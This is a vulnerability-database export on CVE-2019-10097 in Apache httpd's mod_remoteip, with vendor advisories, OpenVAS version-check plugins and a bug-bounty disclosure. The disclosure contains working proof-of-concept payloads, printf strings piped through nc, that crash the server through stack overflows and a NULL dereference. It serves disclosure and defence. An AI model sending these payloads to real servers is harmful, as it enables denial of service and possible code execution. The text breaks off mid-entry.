"bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2019-10097"], "modified": "2019-08-14T00:00:00", "id": "HTTPD:1476868F8E61526B31CAA5707DE2E715", "href": "https://httpd.apache.org/security_report.html", "cvss": {"score": 0.0, "vector": "NONE"}}], "f5": [{"lastseen": "2023-06-14T02:43:30", "description": "In Apache HTTP Server 2.4.32-2.4.39, when mod_remoteip was configured to use a trusted intermediary proxy server using the &quot;PROXY&quot; protocol, a specially crafted PROXY header could trigger a stack buffer overflow or NULL pointer deference. This vulnerability could only be triggered by a trusted proxy and not by untrusted HTTP clients. ([CVE-2019-10097](<https://vulners.com/cve/CVE-2019-10097>))\n\nImpact\n\nThere is no impact; F5 products are not affected by this vulnerability.\n", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-09-09T05:42:00", "type": "f5", "title": "Apache mod_remoteip vulnerability CVE-2019-10097", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.0, "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-10097"], "modified": "2019-10-01T22:38:00", "id": "F5:K54207009", "href": "https://support.f5.com/csp/article/K54207009", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}], "debiancve": [{"lastseen": "2023-06-13T14:30:35", "description": "In Apache HTTP Server 2.4.32-2.4.39, when mod_remoteip was configured to use a trusted intermediary proxy server using the \"PROXY\" protocol, a specially crafted PROXY header could trigger a stack buffer overflow or NULL pointer deference. This vulnerability could only be triggered by a trusted proxy and not by untrusted HTTP clients.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-09-26T16:15:00", "type": "debiancve", "title": "CVE-2019-10097", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.0, "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-10097"], "modified": "2019-09-26T16:15:00", "id": "DEBIANCVE:CVE-2019-10097", "href": "https://security-tracker.debian.org/tracker/CVE-2019-10097", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}], "redhatcve": [{"lastseen": "2023-06-13T14:59:07", "description": "A vulnerability was discovered in Apache httpd, in mod_remoteip. A trusted proxy using the \"PROXY\" protocol could send specially crafted headers that can cause httpd to experience a stack buffer overflow or NULL pointer dereference, leading to a crash or other potential consequences. This issue could only be exploited by configured trusted intermediate proxy servers. HTTP clients such as browsers could not exploit the vulnerability.\n#### Mitigation\n\nThis flaw is only exploitable if RemoteIP* directives are used in Apache httpd configuration. The following command can be used to search for possible vulnerable configurations: \n\n\n grep -R &#x27;^\\s*RemoteIP&#x27; /etc/httpd/ \n\n\nSee <https://httpd.apache.org/docs/2.4/mod/mod_remoteip.html> \n\n", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-04-01T20:22:36", "type": "redhatcve", "title": "CVE-2019-10097", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.0, "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-10097"], "modified": "2023-04-06T05:47:15", "id": "RH:CVE-2019-10097", "href": "https://access.redhat.com/security/cve/cve-2019-10097", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}], "hackerone": [{"lastseen": "2023-09-03T19:39:52", "bounty": 0.0, "description": "Versions Affected:\nhttpd 2.4.32 to 2.4.39\n\nSummary:\nWhen mod_remoteip was configured to use a trusted intermediary proxy server using the \"PROXY\" protocol, a specially crafted PROXY v1 or PROXY v2 header could trigger a stack buffer overflow or NULL pointer deference. \n\nThis was assigned CVE-2019-10097 and triaged by the Apache security team as a \"Moderate\" severity vulnerability, fixed in Apache 2.4.41: https://www.openwall.com/lists/oss-security/2019/08/15/5\n\nThe HTTPD maintainers and I collaborated on the fix: http://svn.apache.org/viewvc?view=revision&revision=1864526\n\nOriginal report to Apache security team (with reproductions) follows:\n--------------------------------------------------------------------------------------------------------------------------------\n\nApache httpd 2.4.31+ and newer when configured with `mod_remoteip` and\n`RemoteIPProxyProtocol On` is affected by multiple vulnerabilities. The\nvulnerabilities can be triggered remotely with malicious PROXY protocol request\ninput (both PROXY protocol versions 1 and 2).\n\nThe vulnerabilities identified in this report:\n\n* HIGH: Stack overflow from unsafe memcpy handling PROXY v1/v2 messages\n* HIGH: Stack overflow from unsafe strcpy handling PROXY v1 messages\n* MED: Denial of service from null pointer dereference handling PROXY v2\n messages\n\nThese vulnerabilities also apply to the 3rd party `mod_proxy_protocol` module\nfrom which the core HTTPD `mod_remoteip` module was derived.\n\n# Reported by\n\nDaniel McCarney - cpu@letsencrypt.org\nLet's Encrypt / Internet Security Research Group (ISRG)\n\n# Background\n\nIn a multi-tier architecture the server that terminates a client connection may\nin turn initiate a new request to another server. For access control and logging\nit's beneficial for the first server to be able to pass along information about\nthe original client request (e.g. source IP address and port) to the other\nserver(s).\n\nAs a replacement for ad-hoc HTTP headers (e.g. `X-Forwarded-For`) the HAProxy\nproject specified a protocol (confusingly) called PROXY[0]. There are two\nversions specified:\n\n* PROXY version 1 - a simple ASCII based protocol.\n* PROXY version 2 - a more efficient binary protocol.\n\nThe Apache HTTPD project added support to the core `mod_remoteip` module[1] for\nPROXY version 1 and version 2 in HTTPD version 2.4.31. It can be enabled\nserver-wide or per virtual host using the `RemoteIPProxyProtocol on`\nconfiguration. Previously Apache HTTPD servers could add support for the PROXY\nprotocol with a 3rd party `mod_proxy_protocol`[2] module.\n\n# Vulnerability Detail\n\nFunction names referenced in this section may be found in the source file\n`modules/metadata/mod_remoteip.c`[3].\n\nTo aid in reproduction I've created a simple Dockerfile available here:\n\n https://gist.github.com/cpu/60365c1451bd531f79f5364f44f18f5c\n\nAnd modified a stock `httpd.conf` to enable PROXY protocol by adding:\n\n1. `RemoteIPProxyProtocol On`\n2. `LoadModule remoteip_module modules/mod_remoteip.so`\n\nThe `httpd.conf` is available here:\n\n https://gist.github.com/cpu/a6b0edaacd9fdf8d978886d0a325d975\n\nAfter downloading both simply run:\n\n```\ndocker build -t test-apache2 .\ndocker run -dit --name test-apache2-app -p 6666:80 test-apache2\n```\n\nHTTPD logs are accessible with:\n\n```\ndocker logs -f test-apache2-app\n```\n\nThe provided proof of concept vulnerability triggers are now ready to be\ndelivered to `localhost:6666`.\n\n## Stack overflow from unsafe memcpy handling PROXY v1 and V2 messages\n\nIn the `remoteip_input_filter` function the data read from the bucket brigade\ncarrying the attacker input (pointed to by `ptr`, of len `len`) is copied into\nthe `ctx->header` structure, at an offset of `ctx->rcvd` bytes using `memcpy`:\n\n```\nmemcpy(ctx->header + ctx->rcvd, ptr, len);\n```\n\nThere is no enforcement that the destination buffer is sized appropriately so\nwhen `len` is larger than `sizeof(ctx->header)` a classic buffer overflow\noccurs.\n\n### Example reproduction\n\nAny PROXY v1 request with a \"PROXY \" prefix, a trailing `\\r\\n` and sufficient\nsize will trigger this vulnerability.\n\n```\nprintf \"PROXY aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\\r\\n\" | nc localhost 6666\n```\n\nStack trace:\n```\nThread 3 \"httpd\" received signal SIGSEGV, Segmentation fault.\n[Switching to Thread 0x7ffff2e0b700 (LWP 17165)]\napr_brigade_destroy (b=0x6161616161616161) at buckets/apr_brigade.c:52\n52 apr_pool_cleanup_kill(b->p, b, brigade_cleanup);\n```\n\nAny valid PROXY v2 request (e.g. supported version, cmd, protocol and address family) and sufficient size will also trigger this vulnerability.\n\n```\nprintf \"\\x0D\\x0A\\x0D\\x0A\\x00\\x0D\\x0A\\x51\\x55\\x49\\x54\\x0A\\x21\\x32\\x08\\x6f\\x6faaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\" | nc localhost 6666\n```\n\nStack trace:\n```\nThread 3 \"httpd\" received signal SIGSEGV, Segmentation fault.\n[Switching to Thread 0x7ffff2e0b700 (LWP 17197)]\napr_brigade_destroy (b=0x6161616161616161) at buckets/apr_brigade.c:52\n52 apr_pool_cleanup_kill(b->p, b, brigade_cleanup);\n```\n\n## Stack overflow from unsafe strcpy handling PROXY v1 messages\n\n### Detail\n\nAfter the `remoteip_input_filter` function has determined that received input is\nPROXY v1 (with `remoteip_determine_version`) the raw PROXY header data context\nis passed to `remoteip_process_v1_handler` to handle decoding the human readable\nPROXY v1 message format.\n\nA static sized buffer named `buf` is initialized on the stack with a capacity of\n`sizeof(hdr->v1.line)`, resulting in a 108 byte buffer. Later, a `strcpy` is\nused to copy from `hdr->v1.line` to `buf`. There is no check that the `strlen`\nof `hdr->v1.line` is less than the capacity of `buf`, resulting in a trivial\nbuffer overflow.\n\n```\n/* parse in separate buffer so have the original for error messages */\nstrcpy(buf, hdr->v1.line);\n```\n\n### Example reproduction\n\nAny PROXY v1 request with a \"PROXY \" prefix, a trailing `\\r\\n` and sufficient\nsize will trigger this vulnerabiltiy. Using requests that are too large will end\nup triggering the more general `memcpy` vulnerability discussed previously.\n\n```\nprintf \"PROXY aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\\r\\n\" | nc localhost 6666\n```\n\nStacktrace:\n```\n*** buffer overflow detected ***: /usr/local/apache2/bin/httpd terminated\n======= Backtrace: =========\n/lib/x86_64-linux-gnu/libc.so.6(+0x777e5)[0x7ffff71927e5]\n/lib/x86_64-linux-gnu/libc.so.6(__fortify_fail+0x5c)[0x7ffff723415c]\n/lib/x86_64-linux-gnu/libc.so.6(+0x117160)[0x7ffff7232160]\n/lib/x86_64-linux-gnu/libc.so.6(+0x1164b2)[0x7ffff72314b2]\n/usr/local/apache2/modules/mod_remoteip.so(+0x39e3)[0x7ffff486e9e3]\n/usr/local/apache2/bin/httpd(ap_rgetline_core+0xfa)[0x43843a]\n/usr/local/apache2/bin/httpd(ap_read_request+0x2a6)[0x43b1e6]\n/usr/local/apache2/bin/httpd[0x464b6d]\n/usr/local/apache2/bin/httpd(ap_run_process_connection+0x40)[0x45beb0]\n/usr/local/apache2/bin/httpd[0x470455]\n/usr/local/apache2/bin/httpd[0x471428]\n/lib/x86_64-linux-gnu/libpthread.so.0(+0x76ba)[0x7ffff74ec6ba]\n/lib/x86_64-linux-gnu/libc.so.6(clone+0x6d)[0x7ffff722241d]\n```\n\n## Denial of service from null pointer dereference handling PROXY v2\n\nIn the `remoteip_input_filter` function it's assumed that when control flow\nreaches L1173 that the `done` variable is true and so the `conn_conf` has been\npopulated with the true `client_ip` and `client_addr` by the PROXY messages that\nwere processed to reach the done state. The `conn_conf->client_addr` field is\nthen dereferenced to log `conn_conf->client_addr->port`.\n\n```\nap_log_cerror(APLOG_MARK, APLOG_DEBUG, 0, f->c, APLOGNO(03511)\n \"RemoteIPProxyProtocol: received valid PROXY header: %s:%hu\",\n conn_conf->client_ip, conn_conf->client_addr->port);\n```\n\nUnfortunately there is a logic error in this assumption. The\n`remoteip_process_v2_header` function returns `HDR_DONE`, triggering `done = 1`\nin two conditions where the `conn_conf->client_addr` remains null, triggering\na null pointer dereference when `conn_conf->client_addr->port` is evaluated,\ncausing the worker thread to segfault.\n\nThe first condition this can occur is when the `hdr->v2.fam` indicating the\naddress family and protocol is unsupported:\n\n```\n default:\n /* unsupported protocol, keep local connection address */\n return HDR_DONE;\n```\n\nThe other condition this can occur is when the `hdr->v2.ver_cmd`'s lower order\nbits are 0x00, indicating it is a LOCAL command.\n\n```\n case 0x00: /* LOCAL command */\n /* keep local connection address for LOCAL */\n return HDR_DONE;\n```\n\nThe comments in the LOCAL command case potentially indicate that there was an\nassumption that the addresses were pre-populated and so HDR_DONE could be\nreturned without error. I believe this code/assumption were adopted from the\nHAProxy PROXY protocol example code at the end of the specification document[1]\nwhere the same `case 0x00` logic and comment can be found. In this example code\nhowever the `sockaddr_storage` for `from` and `to` are said to have been\n\"already filled by accept()\" and \"getsockname()\".\n\n### Example reproduction\n\nThis bug can be triggered with a valid PROXY v2 message using the LOCAL command:\n\n```\nprintf \"\\x0D\\x0A\\x0D\\x0A\\x00\\x0D\\x0A\\x51\\x55\\x49\\x54\\x0A\\x20\\x11\\x00\\x00\" | nc localhost 6666\n```\n\nStack trace:\n```\nThread 3 \"httpd\" received signal SIGSEGV, Segmentation fault.\n[Switching to Thread 0x7ffff2e0b700 (LWP 17395)]\n0x00007ffff486ebad in remoteip_input_filter (f=0x7fffec037690, bb_out=0x7fffdc003e58, mode=AP_MODE_GETLINE,.\n block=APR_BLOCK_READ, readbytes=0) at mod_remoteip.c:1248\n 1248 ap_log_cerror(APLOG_MARK, APLOG_DEBUG, 0, f->c, APLOGNO(03511)\n\n```\n\nIt can also be triggered with a valid PROXY v2 message using the PROXY command\nand an unsupported address family/protocol:\n\n```\nprintf \"\\x0D\\x0A\\x0D\\x0A\\x00\\x0D\\x0A\\x51\\x55\\x49\\x54\\x0A\\x21\\x00\\x00\\x00\" | nc localhost 6666\n```\n\nStack trace:\n```\nThread 3 \"httpd\" received signal SIGSEGV, Segmentation fault.\n[Switching to Thread 0x7ffff2e0b700 (LWP 17437)]\n0x00007ffff486ebad in remoteip_input_filter (f=0x7fffec037690, bb_out=0x7fffdc003e58, mode=AP_MODE_GETLINE,.\n block=APR_BLOCK_READ, readbytes=0) at mod_remoteip.c:1248\n 1248 ap_log_cerror(APLOG_MARK, APLOG_DEBUG, 0, f->c, APLOGNO(03511)\n```\n\n# Mitigations\n\nThe Apache `mod_remoteip` docs[1] strongly encourages care with what\nintermediate hosts should be trusted to provide `mod_remoteip` inputs:\n\n> It is critical to only enable this behavior from intermediate hosts (proxies,\n> etc) which are trusted by this server, since it is trivial for the remote\n> useragent to impersonate another useragent.\n\nAdministrators that restrict the hosts that can send requests to the\nVirtualHost/Server with `RemoteIPPRoxyProtocol on` (e.g. through external\nfirewall policy/network controls) will restrict their exposure\nto these vulnerabilities.\n\nUnfortunately unlike the `RemoteIPHeader` directives it is *not* possible to\nconfigure `RemoteIPProxyProtocol on` and whitelist intermediate IP addresses\n(e.g. like `RemoteIPInternalProxyList`) within the Apache configuration. Thus\nadministrators must take action above and beyond their Apache configuration to\nuse this module safely and mitigate the reported vulnerabilities.\n\n# Applicability to mod_proxy_protocol\n\nThe core Apache project `mod_remoteip` module's PROXY support was originally\nadopted from a 3rd party module, `mod_proxy_protocol`[2]. All of the\nvulnerabilities identified in this report are from code shared with the original\n`mod_proxy_protocol` module. Users of this module with other HTTPD versions are\nequally affected by these vulnerabilities.\n\n# References\n\n[0] https://httpd.apache.org/docs/2.4/mod/mod_remoteip.html\n[1] https://www.haproxy.org/download/1.8/doc/proxy-protocol.txt\n[2] https://github.com/roadrunner2/mod-proxy-protocol\n[3] https://github.com/apache/httpd/blob/8cfc6007670cf4bcc7129c197dda456e0d5de102/modules/metadata/mod_remoteip.c\n\n## Impact\n\nThe classic stack overflows can lead to memory corruption and the potential for remote code execution.\n\nTypically the PROXY protocol is used between security contexts: e.g. a front-end web server in a DMZ terminates HTTP/HTTPS and uses the PROXY protocol when forwarding the request to an application server in a different security context with firewall rules protecting access except from the front-end web server. Abusing the PROXY protocol would allow an attacker who has compromised the front-end web server to pivot through code execution on the application server via crafted PROXY request.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-08-15T14:42:13", "type": "hackerone", "title": "Internet Bug Bounty: mod_remoteip stack buffer overflow and NULL pointer dereference", "bulletinFamily": "bugbounty", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.0, "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-10097"], "modified": "2019-11-07T20:21:12", "id": "H1:674540", "href": "https://hackerone.com/reports/674540", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}], "openvas": [{"lastseen": "2019-10-21T14:58:56", "description": "Apache HTTP server is prone to a stack overflow vulnerability.", "cvss3": {}, "published": "2019-10-18T00:00:00", "type": "openvas", "title": "Apache HTTP Server Stack Overflow Vulnerability (Linux)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-10097"], "modified": "2019-10-18T00:00:00", "id": "OPENVAS:1361412562310114145", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310114145", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nCPE = \"cpe:/a:apache:http_server\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.114145\");\n script_version(\"2019-10-18T14:24:52+0000\");\n script_tag(name:\"last_modification\", value:\"2019-10-18 14:24:52 +0000 (Fri, 18 Oct 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-10-18 15:16:20 +0200 (Fri, 18 Oct 2019)\");\n script_tag(name:\"cvss_base\", value:\"6.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:S/C:P/I:P/A:P\");\n\n script_cve_id(\"CVE-2019-10097\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"Apache HTTP Server Stack Overflow Vulnerability (Linux)\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Web Servers\");\n script_dependencies(\"secpod_apache_detect.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"apache/installed\", \"Host/runs_unixoide\");\n\n script_tag(name:\"summary\", value:\"Apache HTTP server is prone to a stack overflow vulnerability.\");\n\n script_tag(name:\"insight\", value:\"When mod_remoteip was configured to use a trusted intermediary\n proxy server using the 'PROXY' protocol, a specially crafted PROXY header could trigger a stack\n buffer overflow or NULL pointer dereference. This vulnerability could only be triggered by\n a trusted proxy and not by untrusted HTTP clients.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"affected\", value:\"Apache HTTP server version 2.4.32 to 2.4.39.\");\n\n script_tag(name:\"solution\", value:\"Update to version 2.4.41 or later.\");\n\n script_xref(name:\"URL\", value:\"https://httpd.apache.org/security/vulnerabilities_24.html\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!port = get_app_port(cpe: CPE))\n exit(0);\n\nif(!version = get_app_version(cpe: CPE, port: port))\n exit(0);\n\nif(version_in_range(version: version, test_version: \"2.4.32\", test_version2: \"2.4.39\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"2.4.41\");\n security_message(port: port, data: report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2019-10-21T14:58:55", "description": "Apache HTTP server is prone to a stack overflow vulnerability.", "cvss3": {}, "published": "2019-10-18T00:00:00", "type": "openvas", "title": "Apache HTTP Server Stack Overflow Vulnerability (Windows)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-10097"], "modified": "2019-10-18T00:00:00", "id": "OPENVAS:1361412562310114146", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310114146", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nCPE = \"cpe:/a:apache:http_server\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.114146\");\n script_version(\"2019-10-18T14:24:52+0000\");\n script_tag(name:\"last_modification\", value:\"2019-10-18 14:24:52 +0000 (Fri, 18 Oct 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-10-18 15:32:16 +0200 (Fri, 18 Oct 2019)\");\n script_tag(name:\"cvss_base\", value:\"6.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:S/C:P/I:P/A:P\");\n\n script_cve_id(\"CVE-2019-10097\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"Apache HTTP Server Stack Overflow Vulnerability (Windows)\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Web Servers\");\n script_dependencies(\"secpod_apache_detect.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"apache/installed\", \"Host/runs_windows\");\n\n script_tag(name:\"summary\", value:\"Apache HTTP server is prone to a stack overflow vulnerability.\");\n\n script_tag(name:\"insight\", value:\"When mod_remoteip was configured to use a trusted intermediary\n proxy server using the 'PROXY' protocol, a specially crafted PROXY header could trigger a stack\n buffer overflow or NULL pointer dereference. This vulnerability could only be triggered by\n a trusted proxy and not by untrusted HTTP clients.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"affected\", value:\"Apache HTTP server version 2.4.32 to 2.4.39.\");\n\n script_tag(name:\"solution\", value:\"Update to version 2.4.41 or later.\");\n\n script_xref(name:\"URL\", value:\"https://httpd.apache.org/security/vulnerabilities_24.html\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!port = get_app_port(cpe: CPE))\n exit(0);\n\nif(!version = get_app_version(cpe: CPE, port: port))\n exit(0);\n\nif(version_in_range(version: version, test_version: \"2.4.32\", test_version2: \"2.4.39\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"2.4.41\");\n security_message(port: port, data: report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2019-10-02T14:38:52", "description": "The remote host is missing an update for the\n ", "cvss3": {}, "published": "2019-08-23T00:00:00", "type": "openvas", "title": "Fedora Update for mod_md FEDORA-2019-099575a123", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-10098", "CVE-2019-10097", "CVE-2019-10092"], "modified": "2019-10-02T00:00:00", "id": "OPENVAS:1361412562310876707", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310876707", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.876707\");\n script_version(\"2019-10-02T07:08:50+0000\");\n script_cve_id(\"CVE-2019-10098\", \"CVE-2019-10092\", \"CVE-2019-10097\");\n script_tag(name:\"cvss_base\", value:\"6.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:S/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-10-02 07:08:50 +0000 (Wed, 02 Oct 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-08-23 02:23:49 +0000 (Fri, 23 Aug 2019)\");\n script_name(\"Fedora Update for mod_md FEDORA-2019-099575a123\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC30\");\n\n script_xref(name:\"FEDORA\", value:\"2019-099575a123\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/4Q3VMBINKQZAQWXDDMQCNJMYJHPT5R46\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the\n 'mod_md' package(s) announced via the FEDORA-2019-099575a123 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a 